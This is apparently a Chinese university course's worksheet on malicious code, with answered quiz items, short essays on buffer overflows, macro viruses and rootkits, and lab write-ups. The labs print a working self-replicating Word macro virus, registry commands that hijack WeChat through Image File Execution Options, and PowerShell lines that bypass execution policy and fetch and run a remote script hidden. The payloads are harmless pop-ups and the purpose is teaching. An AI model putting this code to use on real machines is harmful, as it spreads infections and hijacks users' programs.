恶意代码原理与防范

1．计算机病毒的主要特性不包括（  D   ）。

A．破坏性    B．繁殖性    C．不可预见性    D．自动攻击性

2．首个诞生于实验室的能利用网络漏洞进行自我复制的Unix程序，被（   A  ）称之为计算机病毒。

A．Fred Cohen     B．Bill Gates     C．Steve Jobs     D．Elon Musk

3．首个真正在网络信息系统中传播的并造成实际影响的计算机病毒是（ A   ）。

A．C-Brain病毒   B．黑色星期五病毒    C．大麻病毒   D．Stone病毒

4．计算机病毒是（ D    ）。

A．细菌感染                   B．生物病毒感染  

C．被破坏的程序               D．能自我复制并感染其他程序的程序

5．防病毒软件不能完成的任务是（ D    ）。

A．查杀部分计算机病毒             B．狙击部分计算机病毒对信息系统的破坏

C．发现并防止部分计算机病毒入侵   D．查收所有计算机病毒

----

1．按照其依赖的存储介质，计算机病毒的类型主要包括（ABCD     ）。

A．引导区病毒    B．文件病毒    C．U盘病毒     D．网页病毒

2．从实现的功能模块角度，计算机病毒主要包括（  ABCD    ）模块。

A．病毒引导      B．病毒传染    C．病毒触发     D．病毒表现

3．计算机病毒的生命周期主要包括(     ABCDE       )阶段。

A．病毒诞生   B．病毒传播   C．病毒潜伏   D．病毒发作  E．病毒凋亡

4．计算机病毒采用的隐匿技术主要包括（ ABCD    ）。

A．Rootkit技术    B．无文件攻击    C．进程镂空     D．DLL注入

5．宏病毒可感染如下文件类型（ BC   ）。

A．EXE文件     B．DOC文件     C．XLS文件     D．TXT文件

6．计算机病毒的破坏性主要表现在（ ABCD    ）。

A．加密文件     B．删除数据      C．销毁数据     D．窃取数据

7．无文件病毒类型主要包括（ ABCD    ）。

A．灰色工具型   B．脚本型        C．潜伏型      D．内存型

8．常用的计算机病毒检测方法有（ ABCD    ）。

A．特征码检测   B．启发式检测    C．虚拟沙箱检测   D．数据驱动检测

9．在数据驱动的计算机病毒检测中，目前有影响力的病毒数据集有（ ABC    ）。

A．SoReL-20M数据集               B．EMBER数据集

C．KMC2015数据集                D．KDD99数据集

10．真正意义上进行物理破坏的计算机病毒主要有（ AB        ）。

A．CIH病毒    B．Stuxnet病毒    C．BlackEnergy病毒    D．WannaCry病毒

----

1.什么是计算机病毒生命周期？主要包含哪些阶段？

1. 计算机病毒生命周期是指计算机病毒从产生到消亡的整个过程
2. 主要包含潜伏阶段，传播阶段，触发阶段，执行阶段

1. 计算机病毒生命周期，是指从病毒编写诞生开始到病毒被猎杀的生命历程。
2. 主要包括诞生、穿播、潜伏、发作、检测、凋亡等阶段。

2. 简述计算机病毒如何利用缓冲区溢出进行自动执行。

1） 缓冲区溢出原理

    缓冲区是计算机内存中用于临时存储数据的区域。当程序向缓冲区写入数据时，如果写入的数据量超过了缓冲区本身的容量，就会发生缓冲区溢出。

2）病毒利用过程

   病毒编写者会寻找存在缓冲区溢出漏洞的程序。这些程序在接收输入数据时，没有对输入数据的长度进行有效限制。

   病毒会构造一个特殊的输入数据，这个数据包含病毒代码和用于覆盖缓冲区并控制程序执行流程的指令。当这个数据被输入到有漏洞的程序中时，数据会填满缓冲区并溢出。

   溢出的数据会覆盖程序的其他部分，如返回地址（在函数调用结束后程序应该返回的指令地址）等关键信息。病毒通过精心构造的输入数据，将返回地址修改为病毒代码所在的内存地址。

   当被攻击的程序在执行过程中由于函数调用返回等操作时，它会按照被修改后的返回地址跳转到病毒代码所在位置，从而使得病毒代码自动执行。

3. 简述宏病毒的传播机制及防御措施。

1）传播机制

  文档共享传播：宏病毒主要寄生在文档文件（如 Word 的.doc/.docx、Excel 的.xls/.xlsx）中的宏代码里。当用户共享含有宏病毒的文档时，其他用户打开这些文档就可能被感染。

  模板感染传播：许多办公软件允许使用模板来创建新文档。如果模板被宏病毒感染，那么基于此模板创建的所有新文档都会带有宏病毒。

  自动执行宏传播：一些宏病毒利用办公软件的自动执行宏功能进行传播。

   2） 防御机制

      禁用宏功能、更新软件补丁、使用安全软件、注意文件来源

4. 什么是Rootkit？其主要功能是什么？

Rootkit 是一种恶意软件工具包，它被设计用来隐藏其他恶意软件（如病毒、木马）的存在，同时也能帮助攻击者获取计算机系统的最高权限（Root 权限，在类 Unix 系统中）或管理员权限（在 Windows 系统等）。

主要功能

隐藏文件和目录：Rootkit 可以隐藏病毒文件或攻击者想要隐藏的任何文件和文件夹

隐藏进程：可以使恶意进程在系统的进程列表中不被显示。

隐藏网络连接：Rootkit 能够隐藏恶意软件与外部网络的连接情况。

提升权限获取：帮助攻击者获取更高的系统权限。

----

1.    利用“台湾一号”宏病毒样本，完成宏病毒感染操作及防御宏病毒操作（10分）。

这里以wps2003为例

前提：关闭防火墙和杀毒软件等等

先新建一个word文档，在点击左上角文件，找到下面的选项

在选项中的信任中心找到右上角的宏安全性

选择安全性低并确认

在可靠开发商全部勾上

打开开发工具

点击vb编辑器

右键查看代码

输入代码

'Micro-Virus

Sub Document_Open()

On Error Resume Next

Application.DisplayStatusBar = False

Options.SaveNormalPrompt = False

Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)

Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule

If ThisDocument = NormalTemplate Then

    Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule

End If

With Host

    If .Lines(1.1) <> "'Micro-Virus" Then

        .DeleteLines 1, .CountOfLines

        .InsertLines 1, Ourcode

        .ReplaceLine 2, "Sub Document_Close()"

        If ThisDocument = nomaltemplate Then

            .ReplaceLine 2, "Sub Document_Open()"

            ActiveDocument.SaveAs ActiveDocument.FullName

        End If

    End If

End With

MsgBox "MicroVirus by Content Security Lab"

End Sub

将其另存为宏可用文件

关闭后重新打开word文档，会出现弹窗

可以看到normal的文件也出现代码

再新建一个word文档

退出时会发现已经被感染了

防御

1. 删除所有被感染的文件
2. 如果有资料所以补方便删除可以找到这两个代码

删除掉这些代码并保存

再打开没弹窗

1. 开启杀毒软件进行查杀

2. 利用映像劫持（IFEO）技术，用3种方法实现计算机病毒对微信应用程序的劫持（10分）。

第一种方法：手工修改注册表

Win+r打开，输入regedit

来到注册表编辑器

找到 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options  这个路径

之后右键>新建>项

输入wechat.exe

然后右键新建>字符串值，然后命名为Debugger

右键修改

之后去找想要的应用，这里以cmd.exe为例，其他的应用路径可以在属性查看到

Win+r>输入cmd，复制它的路径

之后把路径粘贴到数值数据这里，如下图，之后点击确定

之后双击打开微信，出现cmd的界面

第二种方法：利用reg文件

开始之前先把刚刚的wechat.exe删除了

微信也正常了

先新建一个空白文本文档

输入Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wechat.exe]

"Debugger"="C:\\Windows\\system32\\cmd.exe"

这里还是以cmd为例

保存之后把文件后缀.txt改成.reg

双击运行即可

再双击打开微信

第三种：利用reg add命令

还是先再注册表编辑器删除wechat.exe

先在搜索框输出cmd以管理员权限打开

输入reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wechat.exe" /v Debugger /d "c:\windows\system32\cmd.exe" /reg:32

这里还是以cmd为例

双击微信

3. 利用CMD和Powershell实现无文件病毒攻击操作（10分）。

第一种

打开cmd

使用echo命令创建指定宿主文件的ADS文件。使用echo命令为Primary.txt宿主文件创建ADS文件gpnu.txt命令如下：

echo Hello World,Welcome to school of cybersecurity,GPNU!>primary.txt:gpnu.txt

正常情况下，ADS文件不可见，可以用下面命令查看

dir /r

可以使用命令进行查看和编辑ADS文件，命令如下：

notepad primary.txt:gpnu.txt

也可以使用powershell的命令查看：

get-content primary.txt -stream gpnu.txt

现在制作一个脚本文件用来代替病毒

先创建一个文本文档gpnu.txt文件并编辑

msgbox "Hello World,Welcome to school of cybersecurity,GPNU!",vbOKOnly,"school of cybersecurity"

然后将文件后缀改为.vbs

双击运行会出现弹窗

使用type命令创建指定宿主文件的ADS文件。

把vbs脚本文件附加到宿主文件primary.txt上，命令如下：

type gpnu.vbs>primary.txt:gpnu.vbs

使用wscript.exe即可执行上述附加的vbs脚本文件，执行ADS文件primary.txt:gpnu.vbs命令如下：

wscript primary.txt:gpnu.vbs

第二种

运行PowershellISE,并点左上角文件>新建

输入下代码

function Read-MessageBoxDislog

{

$PopUpWin = new-object -comobject wscript.shell

$PopUpWin.popup("hello world,welcome to school of cybersecurity,GPNU!")

}

Read-MessageBoxDislog

然后另存为gpnu.ps1

1. 绕过本地执行

运行powershell，切换到gpnu.ps1的目录输入下面的命令

powershell.exe -ExecutionPolicy Bypass -file .\gpnu.ps1

1. 本地隐匿执行

打开powershell.exe,切换目录后输入以下指令：

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Nologo -NonInteractive -NoProfile -File.\gpnu.ps1

1. 远程下载ps1脚本并隐匿执行

先开启服务

在目标机器进行远程下载

打开powershell，命令如下

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonInteractive IEX(New-Object Net.WebClient).DownloadString("http://192.168.219.131:8000/gpnu.ps1")